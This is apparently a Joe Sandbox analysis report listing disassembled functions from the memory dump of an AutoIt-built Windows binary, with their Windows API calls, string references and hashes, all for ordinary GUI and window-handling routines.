Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
Instruction ID: 74d32c4cb40b7e08b6db649f2ab123151ece79ebf392fbf15db768c01846b4f8
Opcode Fuzzy Hash: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
Instruction Fuzzy Hash: E202DDB0208309BFDB258F18C848BBABBE5FF85314F048519FA99963A1C779D854CF52

Function 007FAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007FAF51
SetTextColor.GDI32(?,?), ref: 007FAF55
GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
GetSysColor.USER32(0000000F), ref: 007FAF76
CreateSolidBrush.GDI32(?), ref: 007FAF7B
GetSysColor.USER32(00000011), ref: 007FAF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
SelectObject.GDI32(?,00000000), ref: 007FAFB2
SetBkColor.GDI32(?,00000000), ref: 007FAFBB
SelectObject.GDI32(?,?), ref: 007FAFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FB05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FB086
InflateRect.USER32(?,000000FD,000000FD), ref: 007FB0A4
DrawFocusRect.USER32(?,?), ref: 007FB0AF
GetSysColor.USER32(00000011), ref: 007FB0BD
SetTextColor.GDI32(?,00000000), ref: 007FB0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FB0D9
SelectObject.GDI32(?,007FAC1F), ref: 007FB0F0
DeleteObject.GDI32(?), ref: 007FB0FB
SelectObject.GDI32(?,?), ref: 007FB101
DeleteObject.GDI32(?), ref: 007FB106
SetTextColor.GDI32(?,?), ref: 007FB10C
SetBkColor.GDI32(?,?), ref: 007FB116

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 12fda1053f0d0d987ebe776972bc9960646b34f545810087540573401aa5cfee
Instruction ID: 068eceda4e139ba0be278ec22319813f044f32e7f50658ccf04db38146e02f37
Opcode Fuzzy Hash: 12fda1053f0d0d987ebe776972bc9960646b34f545810087540573401aa5cfee
Instruction Fuzzy Hash: 286119B2900218BFDF519FA4DC49BAE7BB9FF08320F118115FA25AB2A1D7759940DF90

Function 007F8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F90EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F90FB
CharNextW.USER32(0000014E), ref: 007F912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F9181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F9192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F91AF
SetWindowTextW.USER32(?,0000014E), ref: 007F91FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F9211
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F9242
_memset.LIBCMT ref: 007F9267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F92B0
_memset.LIBCMT ref: 007F930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F9339
SendMessageW.USER32(?,00001074,?,00000001), ref: 007F9391
SendMessageW.USER32(?,0000133D,?,?), ref: 007F943E
InvalidateRect.USER32(?,00000000,00000001), ref: 007F9460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94D7
DrawMenuBar.USER32(?), ref: 007F94E6
SetWindowTextW.USER32(?,0000014E), ref: 007F950E

Strings

0, xrefs: 007F9478

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: a98fdab24d079de4a4fd746f4ab53c86f9b1d272a1433699eba50551181caa67
Instruction ID: b9de3bba4fa48923ac7dc955c68711a4440d92c5b453433cb0f9e3d098c11be9
Opcode Fuzzy Hash: a98fdab24d079de4a4fd746f4ab53c86f9b1d272a1433699eba50551181caa67
Instruction Fuzzy Hash: BCE15A7090020DAADB219F54CC88FFE7BB9FF05710F108156FB25AA291DB798A91DF61

Function 007F4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007F5007
GetDesktopWindow.USER32 ref: 007F501C
GetWindowRect.USER32(00000000), ref: 007F5023
GetWindowLongW.USER32(?,000000F0), ref: 007F5085
DestroyWindow.USER32(?), ref: 007F50B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F50DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F50F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F511E
SendMessageW.USER32(?,00000421,?,?), ref: 007F5133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F5146
IsWindowVisible.USER32(?), ref: 007F5166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F5181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F5195
GetWindowRect.USER32(?,?), ref: 007F51AD
MonitorFromPoint.USER32(?,?,00000002), ref: 007F51D3
GetMonitorInfoW.USER32(00000000,?), ref: 007F51ED
CopyRect.USER32(?,?), ref: 007F5204
SendMessageW.USER32(?,00000412,00000000), ref: 007F526F

Strings

tooltips_class32, xrefs: 007F50D3
(, xrefs: 007F51E0
0, xrefs: 007F4FB2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
Instruction ID: ae4903aeca466d14be7b750bbfa4767647a2608b341c6fbd59a8d1339862a98a
Opcode Fuzzy Hash: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
Instruction Fuzzy Hash: D7B16A71604744AFDB44DF64C849B6ABBE5FF88310F008A1CF6999B291DB75EC05CB92

Function 007D498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 007D499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007D49C2
_wcscpy.LIBCMT ref: 007D49F0
_wcscmp.LIBCMT ref: 007D49FB
_wcscat.LIBCMT ref: 007D4A11
_wcsstr.LIBCMT ref: 007D4A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007D4A38
_wcscat.LIBCMT ref: 007D4A81
_wcscat.LIBCMT ref: 007D4A88
_wcsncpy.LIBCMT ref: 007D4AB3

Strings

04090000, xrefs: 007D4A6E
DefaultLangCodepage, xrefs: 007D4A9B
%u.%u.%u.%u, xrefs: 007D4B16
StringFileInfo\, xrefs: 007D4A0B
\VarFileInfo\Translation, xrefs: 007D4A30

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f391086d5a803f08c0b288c5d75018c2d78e758e95a5b298b6208cf7da8df8dc
Instruction ID: 681c75ecb3f1c49e2e9afba99724d5e57a7f5741ff28ba11de3903ff5608d24e
Opcode Fuzzy Hash: f391086d5a803f08c0b288c5d75018c2d78e758e95a5b298b6208cf7da8df8dc
Instruction Fuzzy Hash: DC41E172600215FBEF10B764EC4AEBF777CEF41710F00405AF918E6292EB7D9A0296A5

Function 00772BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772C8C
GetSystemMetrics.USER32(00000007), ref: 00772C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772CBF
GetSystemMetrics.USER32(00000008), ref: 00772CC7
GetSystemMetrics.USER32(00000004), ref: 00772CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00772D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772D60
GetClientRect.USER32(00000000,000000FF), ref: 00772D7E
GetStockObject.GDI32(00000011), ref: 00772D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00772DA5

Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777

SetTimer.USER32(00000000,00000000,00000028,007713C7), ref: 00772DCC

Strings

AutoIt v3 GUI, xrefs: 00772D44

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c85d5733520867994d9498e279e700738a623f44cb5693268a402c79dee2b984
Instruction ID: 4e046da53a99827d67d8c7f9dd942bdd7fc8de36a49d2315b0e96daa4e94d638
Opcode Fuzzy Hash: c85d5733520867994d9498e279e700738a623f44cb5693268a402c79dee2b984
Instruction Fuzzy Hash: A3B17E7160020AEFDF15DFA8CC59BAD7BA4FB48350F108629FA19A7290DB78E841CF54

Function 00790429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

GetForegroundWindow.USER32(00800980,?,?,?,?,?), ref: 007904E3
IsWindow.USER32(?), ref: 007C66BB

Strings

CLASS, xrefs: 007C64E5
INSTANCE, xrefs: 007C65FA
LAST, xrefs: 007C6472
REGEXPTITLE, xrefs: 007C64B4
ACTIVE, xrefs: 007C6488
REGEXPCLASS, xrefs: 007C6506
HANDLE, xrefs: 007C649E
ALL, xrefs: 007C6622
TITLE, xrefs: 007C6650

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: c1a0ecd0ecce7c80c4c533b5573b4d808f054f834f08b0fcd2b50e268ba08043
Instruction ID: 5fd78dc8f32545ef0dae35a1d24f750954a3e082e3052813a16e23273b0b6de4
Opcode Fuzzy Hash: c1a0ecd0ecce7c80c4c533b5573b4d808f054f834f08b0fcd2b50e268ba08043
Instruction Fuzzy Hash: 6AD1A570104202DFCB08EF60D885EAABBB5FF54344F504A1DF495975A2DB38E999CB92

Function 007F441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007F44AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007F456C

Strings

GETSELECTED, xrefs: 007F469A
GETTEXT, xrefs: 007F4515
GETITEMCOUNT, xrefs: 007F44DE
SELECTCLEAR, xrefs: 007F45EB
GETSELECTEDCOUNT, xrefs: 007F454F
SELECTINVERT, xrefs: 007F463C
FINDITEM, xrefs: 007F46DF
SELECTALL, xrefs: 007F45D3
DESELECT, xrefs: 007F465A
SELECT, xrefs: 007F4606
GETSUBITEMCOUNT, xrefs: 007F44F7
ISSELECTED, xrefs: 007F4577
VIEWCHANGE, xrefs: 007F472B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
Instruction ID: aa74f8a79a00e0c7d2df8a7125ca77286b3af2ec988cb49538cafcbe6c5dfb53
Opcode Fuzzy Hash: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
Instruction Fuzzy Hash: 00A16C30214215DFCB14EF60C855A7AB3A5FF85354F10896CFA969B392DB38EC49CB91

Function 007E56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 007E56E1
LoadCursorW.USER32(00000000,00007F8A), ref: 007E56EC
LoadCursorW.USER32(00000000,00007F00), ref: 007E56F7
LoadCursorW.USER32(00000000,00007F03), ref: 007E5702
LoadCursorW.USER32(00000000,00007F8B), ref: 007E570D
LoadCursorW.USER32(00000000,00007F01), ref: 007E5718
LoadCursorW.USER32(00000000,00007F81), ref: 007E5723
LoadCursorW.USER32(00000000,00007F88), ref: 007E572E
LoadCursorW.USER32(00000000,00007F80), ref: 007E5739
LoadCursorW.USER32(00000000,00007F86), ref: 007E5744
LoadCursorW.USER32(00000000,00007F83), ref: 007E574F
LoadCursorW.USER32(00000000,00007F85), ref: 007E575A
LoadCursorW.USER32(00000000,00007F82), ref: 007E5765
LoadCursorW.USER32(00000000,00007F84), ref: 007E5770
LoadCursorW.USER32(00000000,00007F04), ref: 007E577B
LoadCursorW.USER32(00000000,00007F02), ref: 007E5786
GetCursorInfo.USER32(?), ref: 007E5796
GetLastError.KERNEL32(00000001,00000000), ref: 007E57C1

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
Instruction ID: 23ef72e37f68feba2323e8bd7b82903b82013540eb6bfdf02b31e495c2988dfd
Opcode Fuzzy Hash: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
Instruction Fuzzy Hash: 80415370E04319AADB109FB68C49D6EFEF8EF55B54B10452FE509E7290DAB8A400CF91

Function 007CB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007CB17B
__swprintf.LIBCMT ref: 007CB21C
_wcscmp.LIBCMT ref: 007CB22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CB284
_wcscmp.LIBCMT ref: 007CB2C0
GetClassNameW.USER32(?,?,00000400), ref: 007CB2F7
GetDlgCtrlID.USER32(?), ref: 007CB349
GetWindowRect.USER32(?,?), ref: 007CB37F
GetParent.USER32(?), ref: 007CB39D
ScreenToClient.USER32(00000000), ref: 007CB3A4
GetClassNameW.USER32(?,?,00000100), ref: 007CB41E
_wcscmp.LIBCMT ref: 007CB432
GetWindowTextW.USER32(?,?,00000400), ref: 007CB458
_wcscmp.LIBCMT ref: 007CB46C

Part of subcall function 0079385C: _iswctype.LIBCMT ref: 00793864

Strings

%s%u, xrefs: 007CB216

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
Instruction ID: 3b62c603966ae03cb115a87d787289cf65f64671039a85cb070b4219c21b275d
Opcode Fuzzy Hash: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
Instruction Fuzzy Hash: FFA1E171204346EBDB18DF60C886FAAB7E8FF44350F10461DF999C2191DB38EA55CBA1

Function 007CBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 007CBAB1
_wcscmp.LIBCMT ref: 007CBAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 007CBAEA
CharUpperBuffW.USER32(?,00000000), ref: 007CBB07
_wcscmp.LIBCMT ref: 007CBB25
_wcsstr.LIBCMT ref: 007CBB36
GetClassNameW.USER32(00000018,?,00000400), ref: 007CBB6E
_wcscmp.LIBCMT ref: 007CBB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 007CBBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 007CBBEE
_wcscmp.LIBCMT ref: 007CBBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 007CBC26
GetWindowRect.USER32(00000004,?), ref: 007CBC8F

Strings

ThumbnailClass, xrefs: 007CBB79, 007CBBF9
@, xrefs: 007CBA92

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
Instruction ID: 5eb2a3589362b678dffd100a8fe12f9052d4084c1d760c7ed0950a407dd79ff3
Opcode Fuzzy Hash: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
Instruction Fuzzy Hash: 8C819E710043099BDB14DF64D886FAA77E8FF44314F04856DFD8A9A096DB38ED4ACB61

Function 007CB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007CB915

Strings

[LAST, xrefs: 007CB9C2
LAST, xrefs: 007CB8DA
CLASSNAME=, xrefs: 007CB952
ACTIVE, xrefs: 007CB8F0
[HANDLE:, xrefs: 007CB921
[CLASS:, xrefs: 007CB965
[ACTIVE, xrefs: 007CB902
HANDLE=, xrefs: 007CB90E
ALL, xrefs: 007CB9A9
REGEXP=, xrefs: 007CB92A
[REGEXPTITLE:, xrefs: 007CB93D
[ALL, xrefs: 007CB9BB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: e48a205a642cc34fcb500e4784126c49173c12d0a552b5b429eae2e795dfbcab
Instruction ID: a13a08e4becea7eca87676cbbb977e2c690bd3c01da6e4b04b0cfe91e2f6d423
Opcode Fuzzy Hash: e48a205a642cc34fcb500e4784126c49173c12d0a552b5b429eae2e795dfbcab
Instruction Fuzzy Hash: C131C230684215EBCB08FA50ED47FAD73A8AF20750FA0012DF551B11D1EF6DBE048656

Function 007CCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 007CCBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CCBBC
SetWindowTextW.USER32(?,?), ref: 007CCBD3
GetDlgItem.USER32(?,000003EA), ref: 007CCBE8
SetWindowTextW.USER32(00000000,?), ref: 007CCBEE
GetDlgItem.USER32(?,000003E9), ref: 007CCBFE
SetWindowTextW.USER32(00000000,?), ref: 007CCC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CCC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CCC3F
GetWindowRect.USER32(?,?), ref: 007CCC48
SetWindowTextW.USER32(?,?), ref: 007CCCB3
GetDesktopWindow.USER32 ref: 007CCCB9
GetWindowRect.USER32(00000000), ref: 007CCCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CCD0C
GetClientRect.USER32(?,?), ref: 007CCD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CCD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CCD69

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

